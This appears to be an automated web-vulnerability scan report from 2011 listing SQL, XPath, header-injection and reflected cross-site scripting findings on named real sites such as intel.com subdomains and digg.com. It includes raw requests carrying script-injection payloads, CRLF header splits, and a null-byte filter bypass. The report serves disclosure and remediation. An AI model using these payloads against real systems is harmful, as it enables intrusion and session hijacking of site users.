SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /mr/a.gif?a=6418DC'&v=1 HTTP/1.1
Host: 6418dc.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://itcenter.intel.com/ResourceLibrary?4b801'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e58a74ceab=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 06 Feb 2011 01:55:28 GMT
<html> <head> <title>Runtime Error</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";fon ...[SNIP]...
Request 2
GET /mr/a.gif?a=6418DC''&v=1 HTTP/1.1
Host: 6418dc.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://itcenter.intel.com/ResourceLibrary?4b801'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e58a74ceab=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 06 Feb 2011 01:55:28 GMT
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:14:10 GMT
Server: Omniture DC/2.0.0
Content-Length: 394
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:14:37 GMT
Server: Omniture DC/2.0.0
Content-Length: 437
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/intelcorp,intelnewscorp,intelnewsglobal was not ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:15:19 GMT
Server: Omniture DC/2.0.0
Content-Length: 462
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20. ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The SIP parameter appears to be vulnerable to XPath injection attacks. The payload " was submitted in the SIP parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Issue background
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 2 is copied into the Location response header. The payload fca4d%0d%0a5ca15ea1dbf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-182178-c1-264110fca4d%0d%0a5ca15ea1dbf/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110fca4d 5ca15ea1dbf">he ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 4792a%0d%0a0de4dd1da6c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-182178-c1-2641364792a%0d%0a0de4dd1da6c/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-26413647 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 225ee%0d%0a86d51e0577b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-182178-c1-264138225ee%0d%0a86d51e0577b/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138225ee 86d51e0 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload bdcbc%0d%0a501e00af3ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-182178-c1-264171bdcbc%0d%0a501e00af3ac/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171bdcbc 501e00af3ac">here ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d4e32%0d%0a457ea5750ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-182178-c1-264172d4e32%0d%0a457ea5750ac/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172d4e32 457ea5750ac">here</a>
The value of REST URL parameter 2 is copied into the Location response header. The payload e2a8c%0d%0a47f57a11cd1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-258152-c1-264090e2a8c%0d%0a47f57a11cd1/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-2 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload f9a1a%0d%0a9f2d1231440 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-258152-c1-264093f9a1a%0d%0a9f2d1231440/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093f9a1a 9f2d1 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d2807%0d%0af84a0e66e75 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-258152-c1-264102d2807%0d%0af84a0e66e75/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102d2807 f84a0e66e75">he ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 7044c%0d%0ad07dd0e1f41 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /click/~rss-258152-c1-2641317044c%0d%0ad07dd0e1f41/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-2641317044 ...[SNIP]...
4. Cross-site scripting (reflected)
There are 99 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ddf0f"><script>alert(1)</script>ae77e5693f was submitted in the REST URL parameter 1. This input was echoed as ddf0f"><script>alert(1)</script>ae77e5693f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00ddf0f"><script>alert(1)</script>ae77e5693f?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the SN request parameter is copied into the HTML document as plain text between tags. The payload ef091<script>alert(1)</script>3dacfb292a3 was submitted in the SN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP09ef091<script>alert(1)</script>3dacfb292a3 - Unable to find resource (LOPMASHUP09ef091<script> ...[SNIP]...
The value of the SN1 request parameter is copied into the HTML document as plain text between tags. The payload 1d7b9<script>alert(1)</script>6803e5c75c1 was submitted in the SN1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP111d7b9<script>alert(1)</script>6803e5c75c1 - Unable to find resource (LOPMASHUP111d7b9<script> ...[SNIP]...
The value of the SN2 request parameter is copied into the HTML document as plain text between tags. The payload 85e7a<script>alert(1)</script>3d9a1e6322b was submitted in the SN2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP07A85e7a<script>alert(1)</script>3d9a1e6322b - Unable to find resource (LOPMASHUP07A85e7a<script> ...[SNIP]...
The value of the SN3 request parameter is copied into the HTML document as plain text between tags. The payload 74c09<script>alert(1)</script>e0e02b85dc5 was submitted in the SN3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP07B74c09<script>alert(1)</script>e0e02b85dc5 - Unable to find resource (LOPMASHUP07B74c09<script> ...[SNIP]...
4.6. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://itcenter.intel.com
Path: /ResourceLibrary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b801'><script>alert(1)</script>7e58a74ceab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ResourceLibrary?4b801'><script>alert(1)</script>7e58a74ceab=1 HTTP/1.1
Host: itcenter.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:22:43 GMT
Connection: close
Content-Length: 71611
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US"> <head><met ...[SNIP]... <a href='http://itcenter.intel.com/ResourceLibrary?4b801'><script>alert(1)</script>7e58a74ceab=1&offset=0' class='single'> ...[SNIP]...
4.7. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://itcenter.intel.com
Path: /ResourceLibrary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76eab"><script>alert(1)</script>9b7cdc81c1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ResourceLibrary?76eab"><script>alert(1)</script>9b7cdc81c1f=1 HTTP/1.1
Host: itcenter.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:22:38 GMT
Connection: close
Content-Length: 71611
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US"> <head><met ...[SNIP]... <a class="filter" href="http://itcenter.intel.com/ResourceLibrary?76eab"><script>alert(1)</script>9b7cdc81c1f=1&filters=removeAll&offset=0" fcat="itcenterlanguage" fval="en_US"> ...[SNIP]...
The value of the idPrefix request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83dbe'%3balert(1)//e4158e95dd8 was submitted in the idPrefix parameter. This input was echoed as 83dbe';alert(1)//e4158e95dd8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:14 GMT
Server: Apache
X-JAL: 419
Content-Language: en-US
CacheHit: D=421684 t=1296947654881565
X-JSL: D=421690 t=1296947654881565
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close
<div class="content-large">
<!-- Parameters that have to be defined before including this ftl--> <!-- tagSets is a collection of TagSet--> <!-- Specialize ContentFilterHandler if there is a ...[SNIP]...
$j(document).ready(function() { // Parse the frameID out of the dom var parsedFrameID = $j('#jive-recentcontent-content-block-container_7llQwi83dbe';alert(1)//e4158e95dd8').parent().parent().attr('id'); parsedFrameID = parsedFrameID.substring(parsedFrameID.lastIndexOf('_') + 1, parsedFrameID.length); var pager = new jive.Pager. ...[SNIP]...
The value of the idPrefix request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e736f%3balert(1)//c5ce5e171d4 was submitted in the idPrefix parameter. This input was echoed as e736f;alert(1)//c5ce5e171d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:35 GMT
Server: Apache
X-JAL: 459
Content-Language: en-US
CacheHit: D=461129 t=1296947675093028
X-JSL: D=461135 t=1296947675093028
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close
<div class="content-large">
<!-- Parameters that have to be defined before including this ftl--> <!-- tagSets is a collection of TagSet--> <!-- Specialize ContentFilterHandler if there is a ...[SNIP]... idPrefix: '7llQwie736f%3Balert(1)%2F%2Fc5ce5e171d4' }, false); if (typeof(ContentFilterHandler_7llQwie736f;alert(1)//c5ce5e171d4) != 'undefined') { ContentFilterHandler_7llQwie736f;alert(1)//c5ce5e171d4.contentLoader = pager; } });
The value of the idPrefix request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c39a"><script>alert(1)</script>af3c9d8300 was submitted in the idPrefix parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:13:33 GMT Server: Apache X-JAL: 309 Content-Language: en-US CacheHit: D=311516 t=1296947613247827 X-JSL: D=311521 t=1296947613247827 Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Connection: close
<div class="content-large">
<!-- Parameters that have to be defined before including this ftl--> <!-- tagSets is a collection of TagSet--> <!-- Specialize ContentFilterHandler if there is a ...[SNIP]... <div class="jive-widget-filter jive-content-filter widgetclass_7llQwi3c39a"><script>alert(1)</script>af3c9d8300 clearfix"> ...[SNIP]...
The value of the idPrefix request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cd3a"%3balert(1)//4691b8f75cd was submitted in the idPrefix parameter. This input was echoed as 4cd3a";alert(1)//4691b8f75cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:13:52 GMT Server: Apache X-JAL: 344 Content-Language: en-US CacheHit: D=346411 t=1296947632747487 X-JSL: D=346417 t=1296947632747487 Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Connection: close
<div class="content-large">
<!-- Parameters that have to be defined before including this ftl--> <!-- tagSets is a collection of TagSet--> <!-- Specialize ContentFilterHandler if there is a ...[SNIP]... ontent-content-block-container_7llQwi4cd3a";alert(1)//4691b8f75cd'), "/render-widget!execute.jspa #jive-recentcontent-content-block-container_7llQwi4cd3a";alert(1)//4691b8f75cd", { frameID: parsedFrameID, widge ...[SNIP]...
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 488f2<script>alert(1)</script>c924c785a0a was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1296956995929&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BOVAw%2C&cids=VxBQkM%2C&pstok=b8HFZCHCK-UKDgoKCIOqThDDhIXiFRAACgA&client=ca-pub-5783553522579509&slotname=Tile2_RightCol488f2<script>alert(1)</script>c924c785a0a&page_slots=CenterCol_Tile1%2CTile1_RightCol%2CTile2_RightCol&cust_params=Site%3DHA&cookie=ID%3D9c79886a0efcbf70%3AT%3D1296942810%3AS%3DALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig&ga_vid=1785005893.1296942825&ga_sid=1296956996&ga_hid=1372920090&ga_fc=true&url=http%3A%2F%2Fhomeappliance.manualsonline.com%2Fex%2Fmfg%2Fheadline%2Fm%2Fariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281%2Fd%2Ftype%2Fproduct_problem&ref=http%3A%2F%2Fburp%2Fshow%2F1&lmt=1296978611&dt=1296957011025&cc=11&biw=969&bih=996&ifi=3&adk=1414079277&u_tz=-360&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
